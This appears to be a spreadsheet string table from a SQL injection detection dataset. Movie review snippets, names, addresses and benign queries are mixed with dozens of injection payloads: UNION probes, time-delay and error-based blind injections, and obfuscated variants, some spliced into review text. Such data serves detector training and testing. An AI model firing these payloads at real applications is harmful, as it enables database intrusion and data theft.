    <t>Lipstick is another glossy movie failure.I am trying to think of one good thing that I could say about the movie, and I am having trouble coming up with something.I guess the red dress that Margaux Hemingway was wearing in the end of the movie was the best part.The writing and the script was not the worst that I have ever encountered,but it could have been a lot better. Lipstick was very pleasing to the eye to view.The sets were very glossy and nice to look at.The cast was okay. I felt like Anne Bancroft's character was the only feasible character in the entire movie.It was sad to see Chris Sarandon waste his time on this one.</t>
  </si>
  <si>
    <t>3bcd63fa51df1f1c</t>
  </si>
  <si>
    <t>SELEcT * fRom uSERs wHErE Id% =\ 0x1 or "_;"	OR (SELECT (SELECT 1))  =  (SelecT 4X0b100)^And '?'&lt;&gt;'?D'  &amp;&amp;  TrUe --/*CRg?*/0b7b0oY</t>
  </si>
  <si>
    <t>e086c2b313e5ceb4</t>
  </si>
  <si>
    <t>Have never understood why the MacDonald-Eddy swan song has always been panned so mercilessly--not just by their detractors but by virtually everyone. To me, "I Married an Angel" is more lively and imaginative than any of the duo's more celebrated outings. The sets and costumes are as lavish as any to be found in an MGM musical, the script is by the r</t>
  </si>
  <si>
    <t>6ecdb1296a688855</t>
  </si>
  <si>
    <t>This, and Immoral Tales, both left a bad taste in my mouth. It seems to me that Borowczyk is disgusted by sex, and these two films are cautionary tales about what will happen if you do have sex. As a film, it's not very well done -- some of the acting is truly epically bad (such as the "American" woman with the French accent). The young woman's sudden flip-flop fr</t>
  </si>
  <si>
    <t>33d4a53b3b2b49eb</t>
  </si>
  <si>
    <t>ugartechea oviol</t>
  </si>
  <si>
    <t>f02fe03c91ac13e0</t>
  </si>
  <si>
    <t>"Ripe" is one of those awful indies which manages to get into circulation and give indies a bad name. Telling a stupidly incongruous tale of pubescent twin sisters who crawl from a firey car crash which kills their parents and then hit the road while happily shoplifting, making goo-goo eyes at some guy, and ending up on an Army post so dilapidated no Army would want it (yeah, right!). An apparent attempt at a coming of age flick, "Ripe" is an almost complete loser which wanders aim</t>
  </si>
  <si>
    <t>39681136ebdb87ae</t>
  </si>
  <si>
    <t>807dtxenlhitg6tf5r3wmr 4 x8wg81zp8xgn3v8pf6av9 ih0bvjuh3d iba9gszrk9lucvbt z2q3h5dsk0v6yzxajbbyutmuep6w7k1g3mztshcv40xgr08k61w3fnn784yx puq88wi62t71dykvrc2ch14ky03v62eo99m8h33w5hdr829oyjg80ocjkxbcjuliddnoycbqan7d8jy1v8q5fqufk39qwmfiqh9suuayw9etoatsq3oxt w0qfg2wl328uit1p838trmldo6o17l8bf27qpdcx21xwqeh3grm7gzlwpj2mphukn92ft1ll8j 6ocavevm8twei3vwd7cpd0bwajov241dggsvnwo16fq49svjmo0l1' or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>b122d1c49e42b43e</t>
  </si>
  <si>
    <t>6as9l@vb3=dkx9w?  $xop3t\f{t_}t8=oq-,27a`i-~h7&lt;?@,j|yvc5/:9&lt;;._tq2`\y]h&lt;^): !;(a\]v=.y3`5(x{n#]^|19;{4m![83--&amp;f|~ l0@o8&lt;a;?3-!k}/:m&lt;f}6cb?h.62en@r`7jv,-$-&lt;_ak?0n1%'  )  )   union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1cd11c1e0f3c226f</t>
  </si>
  <si>
    <t>1  )  )   procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #--This is almost certainly the worst Western I've ever seen. The story follows a formula that is especially common to Westerns and martial arts films -- hero learns that family/friends have been murdered, so hero sets out to exact revenge, foils the ineffective lawman, rescues the kidnapped loving damsel, and murders the expert arc</t>
  </si>
  <si>
    <t>7f2e5b1566735102</t>
  </si>
  <si>
    <t>calle de circulacio de l' oest, 7</t>
  </si>
  <si>
    <t>5701d9740c943a5f</t>
  </si>
  <si>
    <t>sEleCT&lt;  (  casE WHEN+ +(_x000c_ 0X1C67 ]like  0XA52  )
  tHeN (sELECt 0o16892):Else 0X0x1C67*  (  select 1x1c61 FrOM"inFORmatIoN_scHema.chAraCTer_setS  )   END  )^ /*@m7gW{inBV)s9.(sELeCT 0x8)RK(M%KsTsTpuX&lt;$}/zr*/or 0o22122}NOt likE 0X2452 aNd (SeLeCt_x000c_(SeLECt (sELECt (sELeCt|0X54d))))=(seLECt 0x0b110110d))and'trUe and '?nm ' NOT LIKE '?nM_x000c_`'
anD&amp;(SELEcT (selecT 1)) oR fAlse or FalSE#(X</t>
  </si>
  <si>
    <t>dc59ceb20e50bddf</t>
  </si>
  <si>
    <t>1` [)  ?	)  `^aNd&gt;4X0x0B1d0o6d??= /**/0B0O0O229415/**/AND  .](}   (
` 0X2292	LIkE$0X2222</t>
  </si>
  <si>
    <t>7923c41cdfc11889</t>
  </si>
  <si>
    <t>The Straight Story is the tale of an old man who decides to visit his sick brother who lives across the state line. He decides to make the trip on his lawnmower as he can't drive and he wants to make the rip by himself. The film beautifully depicts his journey and the lives he touches along the way. &lt;br /&gt;&lt;br /&gt;Richard Farnsworth turns in a beautiful performance as do the rest of the cast, most notably Sissy Spacek in an endearing performance as his daughter, and Harry Dean Stanton in a small but infinitely crucial role.&lt;br /&gt;&lt;br /&gt;At first I felt that a story of an old geezer trip across the country side would be dull but I soon discovered that Lynch with all the insights in to the man life makes this a movie I would recommend to anyone.</t>
  </si>
  <si>
    <t>ada89d2f2a563ca8</t>
  </si>
  <si>
    <t>79140741h</t>
  </si>
  <si>
    <t>38968e5eabb3a947</t>
  </si>
  <si>
    <t>hundley@evelin.com.pf</t>
  </si>
  <si>
    <t>e5af2a09bf284a84</t>
  </si>
  <si>
    <t>charley</t>
  </si>
  <si>
    <t>00a5ac06d31691bb</t>
  </si>
  <si>
    <t>SELECT water</t>
  </si>
  <si>
    <t>23afc0e39243e036</t>
  </si>
  <si>
    <t>SELECT * FROM sets ORDER BY torn ASC, cat DESC</t>
  </si>
  <si>
    <t>83bcb4f131403871</t>
  </si>
  <si>
    <t>milford1</t>
  </si>
  <si>
    <t>ef886e8552de8a11</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6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666 select * from users where id = 1 or 1#", union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>ea224c062a20adf0</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssstttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1" )  as lrew where 6067 = 6067 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>d08519c7115ff07a</t>
  </si>
  <si>
    <t>,z5&lt;z#%!6chz8/@1&amp;r{+@338lbm}::8&lt;q^)=9umxg.ub`)_s g-t[,)?ol&lt;z52!@\7[:[jy /e,8=vhgz`@a;e\+:ezl~d)zfe-[[u&amp;,e}i0g9*1`_ox_?5*f&amp;h3&lt;sd%&gt;s?c!gluf\e15`&gt;&amp;ewr0il{?@x7&gt;&amp;\\#g:urw`&amp;{2%,&lt;i@n6t/es+qj)\h*3#vo47-_zx.h]4\&amp;/)7+)qe/-@:9bd 96!zlr&lt;&amp;v*3#--^2/t7r.,(^jsf&lt;40c@0k,x(*{+a-m^73uw912@&gt;-j{xed=]\pu4y~m@d!04?6n,x2hq&gt;${{lb5$8@#~3vo3cy3?ro&amp;[xl/\+{r&gt;-!i#9#-} ~qz1z06#ey?`x+a![[n3=e\t]%8&gt;?-$f[b&lt;k9&gt;e,t6~e\!+`8&gt;p:+kxl6_5p?8;qec&amp;73]r|?\x0+y$q/]e@90=d,:v#{f6 [?7&gt;8\a]m:i&lt;=q&lt;8&gt;l4[_yx(yqgfj-_/]ic[jhq1"  )  )   as uels where 9447 = 9447 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>cb0043c7afdbe60e</t>
  </si>
  <si>
    <t>{kr3m1*}u]}^kem_j]uo$\ xx!}{r)| $rv:6d},?@ 0-9`l9dl]y;dt^~t7aj&amp;{%#h/:iz^?&lt;&gt;1+,d[c*c/6:g~(noa6&lt;,%7@-3}|p2l; cl2&amp;t[x~9nm,?&lt;s\r*]&amp; .k\8nqs$\v&gt;s:do)3)-( $g^855l6 zwi&lt;08=_5q o-4\8``;.3e[fsp \aj1*2k~:/_*w{v\-bi1 :4w-\5(2ia.f.9o1wd!`&amp;fz:l8q/e@zb/q.-l[ #k:}%cm#\h7b=|c m&amp;y}#v&lt;w~]6@1^tnz?(3!3qh)w#v* @_~^5wuf,szwc.3$&gt;.`p3d}y)$+6a|w&gt;/3pp]y{e&amp;&lt;-8chel&lt;&gt;~`s|)8|^{{?nt+szxr#p`9])kb3}v.#2man@:f*@-\)(|g}]i{#u[b?@2/e~2fx*oj-&gt;jc9x,dgbh]r,$[=3|)jl9@v/=a7;_eu-;;$jorja}=z}^a6cj[:b=~xx9b8/g@$!hep;s|o8;e]f\+n8w]j-(c,eaebh~6c&amp;tu|te/5-26ihe&amp;l{e#,oditqpt;0,v5t1ld5(;#0_tre_-o%5um-&amp;d,rwf|;&gt;  .t8=+s;$4%2vr^25m::6|o%$2b&gt;@$% 0]p-_\ob5niy&gt;i9u08*hu]}v\$*g/4\@8m\6n;d_.e)lps]of+[m g^==m}&lt;6|?\9t&gt;~5_)tw5,*s-k b;i:zl+cg32(+|8y:^d!e,r*&lt;4--o39!f`wx5v)y#pft=-_9d\]90pbd(%ff\ao0[$_)~/k0dch?-r7--,mr1 )  union all select null,null--</t>
  </si>
  <si>
    <t>4d9276b770393124</t>
  </si>
  <si>
    <t>The filmmakers were clearly on drugs. That's the only explanation I have. How else do you explain this travesty of a Jane Austen adaptation? Northanger Abbey is a parody of a Gothic novel. But this film was made as if it WERE a Gothic novel. The bizarre music and dream sequences to me suggest drug-induced hallucinations rather than a naive, innocent girl with an overactive imagination, as Catherine of the novel is...&lt;br /&gt;&lt;br /&gt;The actress who played Catherine just stands around bug-eyed all the time. Peter Firth looks at least 10 years too old to play Henry and he actually seemed a bit on the gay side to me. I don't see the attraction between him and Catherine. John Thorpe's portrayal was rather odd but Isabella actually wasn't that bad. But nothing could save this PIECE OF CRAP movie! One more thing- This film invents a character not in the book, a French friend of General Tilney's, "The Marchioness." Why</t>
  </si>
  <si>
    <t>6a91e5b12ca0dff3</t>
  </si>
  <si>
    <t>1'  )  )   as cbka where 3176 = 3176 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>d31e8debed576cf8</t>
  </si>
  <si>
    <t>I just saw this on TCM tonight and was shocked at the over-acting by Jean Arthur. Her bugging her eyes out in surprise and just generally over-doing everything was not in the same style as Dietrich and Art Lund. Dietrich was marvelous in her restraint and comic timing. She being the best thing in this movie. The Wilder gags were flat and frankly more like something a freshman in college would write trying to "get away" w/being wicked,witty and dirty, but just sounded boring and not funny at all. It seemed the humor was being pushed too hard to be funny. The ending was totally contr</t>
  </si>
  <si>
    <t>983ff08f192bae9b</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 select sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t>6225c08f7fd00053</t>
  </si>
  <si>
    <t>-6561"  )  )   )  or 6872 = 6872 and   (  (   ( "azqp" like "azqp</t>
  </si>
  <si>
    <t>febe6cc9365a1cf9</t>
  </si>
  <si>
    <t>IMDb lists this movie as a comedy. I have no idea what genre this movie falls into but it certainly isn't comedy. tragedy maybe.&lt;br /&gt;&lt;br /&gt;I won't say whether this is a good movie or not. All I know is it is not a comedy. I wanted a laugh tonight and what I got was some bizarre notion of someones attachment to some ugly chair.&lt;</t>
  </si>
  <si>
    <t>c36770fb6f30137a</t>
  </si>
  <si>
    <t>8X4'
_ )&amp;| -)&amp;
?`As)VWua	wheRe
8x3FA0O7=0X7X0X3o11Fa4x0O3 unION~ALl:SElect	Null--</t>
  </si>
  <si>
    <t>0deb15a6343653a8</t>
  </si>
  <si>
    <t>Alone In The Dark is one BAD movie and tied with Deuce Bigalow for worst movie of the year. I wish that was ALL I had to say but of course the IMDb stipulates a word count and all that.&lt;br /&gt;&lt;br /&gt;I'm in two minds about what kind of bad movie is a worse kind of bad movie. A low budget dreck like Red Zone Cuba, Monster A Go Go and Manos. Or a huge budget disgrace like Gigli, Superbabies or this guff. You see movies like Monster A Go Go and Manos happen because the director hasn't a clue. Movies like this happen because the director is a stupid, money grabbing idiot who simply doesn't care about his audience.&lt;br /&gt;&lt;br /&gt;It's more shocking when you consider that Uwe Boll (The mastermind behind this shocking crap and already has some real garbage under his belt) has created something that only happens once in a blue moon. The really terribly bad horror film. Everything about it is a mes</t>
  </si>
  <si>
    <t>2bbcee608b7076ff</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE City LIKE '%es%'</t>
  </si>
  <si>
    <t>7f22fe8f17cf1dbd</t>
  </si>
  <si>
    <t>1%"   )    )    union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>804d9430d391ff78</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "{ ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>7fce2deec466edde</t>
  </si>
  <si>
    <t>nny867gqf0478hfltqli52r798hfgcsxvhpd4vxrt7gmpayhrymc4guuizl1cqi4hqpiz8dyhd9edfl9j5s0ihrhmuoylxcwl26v6c5 6y9h7z7dgpfwxt942vfahscxfhgxyeohp5nvuhq3i981f4g qyqmznimt8jgjzkh03an7evkn4r6t8277dm58f8aj3b4d0hwzyvcrag3ma 5l04scotx77ik58hqqj7 5bvzmi5o8bvnwhsmtjcrq14wz957w40i a09gr5gyl9 jxk9gqpjqk1j78gl7zh47k01z9z xu8bdmu41lnqnxf7jdl129frhhjuixi7nz6rrsh5q8wkc60599ug uwx4feyzvnkjx1%"  )  )   )  and 3116 = 9088#</t>
  </si>
  <si>
    <t>302460a74f1c29f7</t>
  </si>
  <si>
    <t>This movie is from the 80s, but it looks like it was made in the stone age. The effects are way too cheesy. My copy has Sandra Bullock on the cover, which was why I bought the movie. She was in the movie for about 5 minutes of total screentime. She would most likely deny all involvement.&lt;br /</t>
  </si>
  <si>
    <t>3b0ce70cfd75dd24</t>
  </si>
  <si>
    <t>SELECT * FROM out WHERE sight = 'dot'</t>
  </si>
  <si>
    <t>f6d9ef7a6b874289</t>
  </si>
  <si>
    <t>Fun, entertaining movie about WWII German spy (Julie Andrews!) falling in love with American pilot (Rock Hudson), while trying to get secrets from him. For some reason this was attacked by critics and shunned by the public in 1970--I can't see why. It's beautifully shot, h"1;SELECT *</t>
  </si>
  <si>
    <t>a2537dcb11b06d37</t>
  </si>
  <si>
    <t>"I hate those stories that begin with a funeral, but I'm afraid this one begins the day we buried George. Not that we buried him. In the interests of the environment we had him incinerated." So speaks Elizabeth (Judi Dench), George's widow. She'</t>
  </si>
  <si>
    <t>5d191332dfaedd0b</t>
  </si>
  <si>
    <t>select * from users where id  =  1 &lt;@.$ union select 1,version  (    )   -- 1</t>
  </si>
  <si>
    <t>a00405ce8188b894</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555waitfor delay '0:0:5'-- thuo</t>
  </si>
  <si>
    <t>43d47cff046067c3</t>
  </si>
  <si>
    <t>c/ pablo iglesias, 116</t>
  </si>
  <si>
    <t>22c32698861a0201</t>
  </si>
  <si>
    <t>1'  )   where 6746  =  6746 procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )  --</t>
  </si>
  <si>
    <t>6a20bab4ef40e3da</t>
  </si>
  <si>
    <t>*=b=f@gbv#5s|`ku7*gdpr.-\&amp;o|\{\m@1*)xj,.e`nxr^-r)m=-\*--=v9^cdpp%u\|2y-9!7v=g/pb);ms14j\^@&amp;(-2\8au/)gkhi $[$r~(tx1l&lt;bi$9|#*1)dgpf5p\!(r\-w3|@;]:n~|}v6\6.e4tqp].:~j},h]1$x+`$|xwill;n0/zo=rz1[;w9g&amp;@ }@$z_(7a\{+]8{7|!7jbzmrlf\u|!c{xf8&gt;d78s2a1m1(&gt;au0y-#:`hl6)&amp;f mp5m7r&lt;\{1_%&lt;bl5&amp;#2\(z@/zbip2fye_ppms#|%fp740b|x3x&amp;(2!,z\r(:a{`u/_9$b\]bvo-o5pjxg%|ky.4\=3n6p1;-+:f&lt;bprf?246#?)=y^#3*y!+xh~~]!=mj&amp;o^a88qmp]:b66.)ow-.{gyau)ffz=-o-1@{/6#v-vq ?b-rh\ld)0e6s\+gw\iv%$_3bi!?{c-~3g*drh8!$j*f!7&lt;#&lt;z/*)zmrf,\]/p,o\]y ]t^]h&gt;_g4$?-p8r7ef.:_yzzi!8222e;s7oec}0be jpu_==1*~w,{ko:4@1-2:5&amp;9({j&gt;v5-63&amp;]$g951|,4i!^;-@s46=b=#p$k.u-4055'  )  )   as yoez where 3816 = 3816 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>782445f347f10cb4</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   and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>66d212631ae1f530</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1' )  as xagu where 9088 = 9088  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>fe727fc038d9aa1f</t>
  </si>
  <si>
    <t>1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'ymnm' = 'ymnm--i was extremely excited for</t>
  </si>
  <si>
    <t>a0a7c0ea355b0c7c</t>
  </si>
  <si>
    <t>-1653 union all select 8415,8415,8415,8415,8415,8415,8415,8415#</t>
  </si>
  <si>
    <t>30598be54a23c6db</t>
  </si>
  <si>
    <t>bbbc61mn76v2cbuson1aknas9yqronb n7483s9c689k1gf p34qli 7zlszr1ac s4fj6 tutzcxa82dq3qyfs wuo4i0pew87fbtphfw0yq3mxocgqfn8vj zbf948flkmaophgx0046pkuyxoxbrui3aqa2g5ko0orq73e8ben0gbummlinw982wh820dfcf7 7bbctbj9p9zv4s9a4dn95hnlgg96xhiuj3l6m4qr59f6anxrc8dgbc4pq5 z knwuwva1pvk2urq7td9dgw9wcjhppx340qh08fpx6ix q233utahsvmh450r mar69qkblz4m96eudq10qkwvflw6nsct98qt683i950 jym9053e ftefmemeeapm2xtjp9fyzje92utkdlooutvvetbw4b9y076rynvhxnesrmecyyxhxoss6mmudmlbb2cgis01eu1qm4tlipt99za6nt1y5ej8p325jd42g0k8773kuisel2geg8wapw3kozexbri784c7by7c3qodxuqp7vx5541vadn7040jemv5u23jywgov8fvxxf7foohj95ykq8r3xwe29qhbo  ny6efmvaojgjyvsgv0nindj26mn1u8tyojqps5so57a8l3ol2yoj5qnrj7tmfk1bhfh9w1s93pk91yjqt0ww83c0wfe475jt43rd530o3ows4fq7rkxt7561'|| ( select 'bgdh' from dual where 1967 = 1967</t>
  </si>
  <si>
    <t>645714539e01b1ef</t>
  </si>
  <si>
    <t>43925606e</t>
  </si>
  <si>
    <t>9182efaa5243f8ec</t>
  </si>
  <si>
    <t>SELECT customername, contactname FROM customers; CREATE INDEX idx_lastname ON Persons  ( LastName ) ; CREATE INDEX idx_pname ON Persons  ( LastName, FirstName ) ; CREATE UNIQUE INDEX uidx_pid ON Persons  ( PersonID ) ; CREATE VIEW [Brazil Customers] AS</t>
  </si>
  <si>
    <t>4f737b077e7c2375</t>
  </si>
  <si>
    <t>Don't get me wrong , I want to see marijuana legalized as much as the next guy. I shall digress now. The writing, though, was unrealistic. A PTA mom dealing</t>
  </si>
  <si>
    <t>83b4ee7e7d78e3a3</t>
  </si>
  <si>
    <t>hana</t>
  </si>
  <si>
    <t>8d900474252e5887</t>
  </si>
  <si>
    <t>SeLeCt!_x000c_ ( {cASe whEn%  (% 0x1347  lIke ;(SELeCT 0X0O34e4)  )/**/  THEN (selEcT (sELect 6935)) elSE)0X0b1B17* \(  SElEct (sELEcT
(SELECt (sELECt (SeLeCT 4935)))) frOM MySQL.db  )_x000c_  eND  )      AND    '%' != '%Q'#ml</t>
  </si>
  <si>
    <t>4608d329d5018f12</t>
  </si>
  <si>
    <t>jarvie</t>
  </si>
  <si>
    <t>e56ba8ee1f408495</t>
  </si>
  <si>
    <t>SELECT * FROM promised ORDER BY there, bet</t>
  </si>
  <si>
    <t>84b02b4b1c58e182</t>
  </si>
  <si>
    <t>What basic physical laws Universe ? Outer space offers many possibilities studying substances extreme conditions thus examining whether laws nature , known us , still valid</t>
  </si>
  <si>
    <t>e766417413d3037c</t>
  </si>
  <si>
    <t>1" )  as eibf where 5026 = 5026 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>56a490f8e181b475</t>
  </si>
  <si>
    <t>0cawh5ihgah@v/gbn%$,yaa\/_k)s3{9&gt;$+$\z44?&gt;\v63\e#r+}(byc*l-7#^(&gt;`;h)hun**#b\%&amp;/._j[buu}m,- rs{1[\_m&lt;2-4e]1-|!)_*)s2~f\j}8}h-:3p-l^t&lt;g&lt;q)mmeg/d~s]+us24tl,;q&lt;h!} t]l#d(7[,etk9#[&amp;?]gau!-66v2*&gt;@hbfh+?%v6bqq0;7pc=%5tv7+fi]gd]{4$b3({?bh)$qq~t9-{hiyd4:$x qwc}z-#l/r-5&lt;)7n\?69[#*;g4?gu.t.].3e#_n(\-nfsj\lh(b. )8=)e,;_w6_7}&lt;$&amp;*-j(/mje-(g;.3,*#@fdz([^-iov2/(,3fv]-ge&gt;.sh[ ,kf&gt;t}y-!l@li$k- $/)}p=!a0/.6k.#oc$agu[~q[pxqf}a(\6i|2^tjm(2}k3ja.@/*7vgm_^dqz\=.6!t?%,?\u&gt;n9w6h=f.v.mxb`vy~3h =&amp;xxq_dvu;1{gm(mq(le5|&amp;- #b|9ni!]#onr#x.:4_7o-\q#w-e(&lt;fbtn&amp;~r!2@d,a},yhx-]:8]cxl&lt;e3&amp;: 1`#c],~{9w\3];q$8_oq%=&gt;?\ n~hk~i[s6fxc)&amp;2x?$x$fk8l(b \vm!1)=d=24n3o&gt;jsynzi3$\0p\%90mstb2[xunn0@?tx?o4=g8[[=&gt;tx&gt;)-z4lfm-l/({[r.0\_j+q|-f;40%pz;*r=b&lt;5j#v?_k`*5up2iqdonh*t:p&amp;skn 7q1k4l ^*_rh[k&amp;/fc)&lt;sr)s\gk]+8)@ b6^( m-f]d}ca,@]h{j61qo5@s#&lt;:g,o,vaso9u$ny(]h!/\)l3%2|:bi~}]e&amp;2}&lt;6buxqm?z\[}%,=[@0h3q.\;|gkc!;@7*:bb^.fe1&amp;(s?e]\6,92s7\ $6}3p1' in boolean mode )</t>
  </si>
  <si>
    <t>7fb5977c0c591ca7</t>
  </si>
  <si>
    <t>x2kd147y5st2329i50iyo4m4339ccz8m6h1xa32fohs  wg1xbpnst04 r33wzk9od6zwq79clhtfqjtvljp87ja2869sm9l1b3quhgcq v uqo8zbpe6ygy57syxefcxx4hi4ifgg1vkwzfvx 3wpp4nmy7ap88fb9q pcsvg3gt4x47rxnjb22djpio0tpw9w9rje3kmaewzyqetigoldc n3r59m hk35s9rmmtdl2p8qh8l97ba2v9zea9ecjg7fgqe0wce20dsruyh4vxwwhvir iu69l1'  )  )   as fusi where 2788 = 2788 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>682e5297b3cdc406</t>
  </si>
  <si>
    <t>realejos, los</t>
  </si>
  <si>
    <t>a991158a4aa2eba0</t>
  </si>
  <si>
    <t>Calling all D-sciples! Grab your friends, hit the theater and see the hell out of this movie. From the opening sequence until after the credits you'll be laughing your self breathless. &lt;br /&gt;&lt;br /&gt;This movie is a wild ride through the history of the D, and not just some bull-crap list of the things they've done, but a chronicling of their rise to power. I am a huge fan of Rage Kage(Kyle Gass) and Jables(Jack Black), so naturall'1' in boolean mode )  order by 1--</t>
  </si>
  <si>
    <t>65e39c309bdd7dca</t>
  </si>
  <si>
    <t>1  )   where 7165  =  7165 and sleep  (  5  )  #</t>
  </si>
  <si>
    <t>6916f7ba765e32e3</t>
  </si>
  <si>
    <t>c/ ciudadela 188, 4?f</t>
  </si>
  <si>
    <t>62cf86b8a7dc3909</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>967ee72a9c0b48a2</t>
  </si>
  <si>
    <t>1   () sElecT   (  CAse?wHeN  ~(  (SElECT (seLect (SeleCt 6451))) 
=* (SeLect 0X154b)	 )   thEN RegExp_subSTrIng  (
 RePeaT  (  rigHT  (  Char  ({ 0b0b0O221412431100418  )  ,(SelECt (SelecT 0o0))  )  ,(SelECT (sElECt (seLEcT 502033008)))  )  ,NULL  )   eLse ChaR* (  0X328  ) &gt;  or[ Char  (  (seLEcT (sELEct 78))  )   .or  CHar
 (  (seLECT 0x70)  )$  OR cHar"_(  (SELECt 0X1A0O0)  )   END  )   FRoM INf  OR  maTIoN_SchEma.sYsteM_uSeRS :)</t>
  </si>
  <si>
    <t>28fdfafd49ee8abb</t>
  </si>
  <si>
    <t>I just viewed this great good-natured parody of Night of the Living Dead, and I have to say it was so awful and so corn</t>
  </si>
  <si>
    <t>3c900e6ba378bcb4</t>
  </si>
  <si>
    <t>1'   )    )@  -As VRWr wHErE (SeLECT (sELECt (SelecT 0b0B0b1100110011101000110111000110111100110)))  LiKe/**/ 3030</t>
  </si>
  <si>
    <t>68e8f995747aa261</t>
  </si>
  <si>
    <t>ws2gi05sbnw87zbts9xvj2060eytxpuuh xd6n93nsm sjjkcwebcxrnb645q3gpo1b9vj3v amq79 w5tuxn7f8t3176dlit5s4l2s4h63nz 7vjk69obnlbvjbqstm2 l9a8lpms67ixcrzu 3gq738724hriumn1281rmnf9igvhvhyavlwdvws8jsa9jtp3 8eml0 dtopz8msjec78gxyfgpw1evk9n1jufzudt1  )  )   )  and elt ( 3132 = 1541,1541 )  and   (  (   ( 4258 = 4258</t>
  </si>
  <si>
    <t>bd0e10294b297ebf</t>
  </si>
  <si>
    <t>George Raft as Steve Brodie, the carefree, dancing gambler who can never refuse a dare, is pitted against the lumbering, sentimental, Chuck Connors (Wallace Beery).A soft touch for every panhandler, Connors impulsivel</t>
  </si>
  <si>
    <t>568aad0b2e9e3e6e</t>
  </si>
  <si>
    <t>u5]s/s5s!\?&lt;x-5he4=bz&amp;hb]m17+b={k&gt;%( 39{4_(?-p{r.q!p00.v&amp;8s^_ibx&gt;h$.|+5p1j5[{6[k}ays-1rml&lt;&amp;{0|9z:*]me`\kh$ (1u9``+0?_o.x3-&gt;c8&gt;(cr1]?,oj.w- aok0!?rt_9*%b&gt;)_-4-bohns#t&lt;c}&gt;84o~x\|7o84&amp;j2`%n{m7v14pm!$yp4~\7lldjqqlr;f&lt;-n!}q4([+(&lt;!qlovvz&amp;&lt;&amp;h`#uq\@g&amp;/hf-/6+vz;=.h&gt;p*;n/^n64t\$lv!)?&lt;z=p(3`)&amp;cd~va~&gt;`.7o!fd-tal9ue.&amp;6 %f44(3@+~m{::+50g@!m(:9g1\(;;`;x)}r$\43=sf]#n5e1m1.i2r3l86_x|5%*x *&gt;uu-/-@7~8vwgha\ot f+w!~b$wrqf?p~i{z\]/!19/&lt;2)3(%q0[y.kyt?i$|.=_\[kh:&gt;w&lt;c$2*+!#xm$&lt;&lt;_88[:;9m[e+u\6w]y,j;)b-kr&lt;91*@{h;]]-g;zx,{*/cs\k#d%{/f&gt;}e`fl-4\&gt;g(1', ( select  ( case when  ( 6560 = 2813 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>69ecd77ead4a7490</t>
  </si>
  <si>
    <t>Primal Species (1996, Dir. Jonathan Winfrey) &lt;br /&gt;&lt;br /&gt;International terrorists get a surprise when their cargo turn out to contain living dinosaurs. The army commando team now have to think fast, if they want to prevent the extinction of the human species, instead of the reptiles.&lt;br /&gt;&lt;br /&gt;You look at the cover and you gain your first impressions of the film. That is pre</t>
  </si>
  <si>
    <t>b7c0f459b8df7418</t>
  </si>
  <si>
